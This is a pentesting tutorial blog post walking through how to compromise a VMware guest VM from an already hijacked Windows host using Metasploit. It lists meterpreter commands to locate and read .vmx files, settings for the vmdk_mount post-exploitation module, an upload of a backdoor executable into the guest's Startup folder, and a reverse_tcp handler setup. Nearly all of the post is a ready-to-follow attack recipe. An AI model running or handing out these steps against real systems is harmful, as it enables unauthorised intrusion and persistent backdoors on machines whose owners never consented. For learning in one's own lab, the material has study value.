Hello friends!! Today you will how to exploit any operation system running inside the virtual machine.

Requrement

Attacker: kali linux

Target: VM image windows server 2012

First attacker needs to exploit actual operating system of victim PC and attain the meterpreter session with admin privileges.

From given image you can perceive I have seize windows 10 meterpreter session and also gained admin privileges. 

meterpreter > sysinfo

When you install any operating system in your vmware workstation then all its hardware and network setting get store as .vmx file in actual operating system in order to create new virtual image.

Type following for making search of .vmx file stored in it

meterpreter > search –f *.vmx –r

From given image you can perceive that it has dump the all location where .vmx files are stored.

Using cat command you can read the content of file as these file simple text document which contain vm setting information.

We had opened windows server 2012 vm image through cat command.

meterpreter > cat “d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx”

Here from given below image you can read the details of this file which is describing network and hardware setting.

This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots or clones are linked from the file.

use post/windows/manage/vmdk_mount

msf post(vmdk_mount) > set DEL_LCK true

msf post(vmdk_mount) > set READ_MODE false

msf post(vmdk_mount) > set session 2

msf post(vmdk_mount) > set VDK_PATH “d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx”

msf post(vmdk_mount) > run

Great!! We have successfully mount vmdk file of windows server2012.

meterpreter > show_mount

Now from given below image you can read the information of each drives.

Now using given below command I will upload an exe backdoor in L: drive which will give us reverse connection of windows server 2012 when it will be running inside vm workstation.

meterpreter > upload /root/Desktop/abc.exe “L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup”

use exploit/multi/handler

msf exploit(handler) >set payload windows/meterpreter/reverse_tcp

msf exploit(handler) >set lhost 192.168.1.113

msf exploit(handler) >set lport 445

msf exploit(handler) >run

 Awesome!! We have successfully exploited windows server2012 virtual machine and gained its meterpreter session.

meterpreter >sysinfo

Source: http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here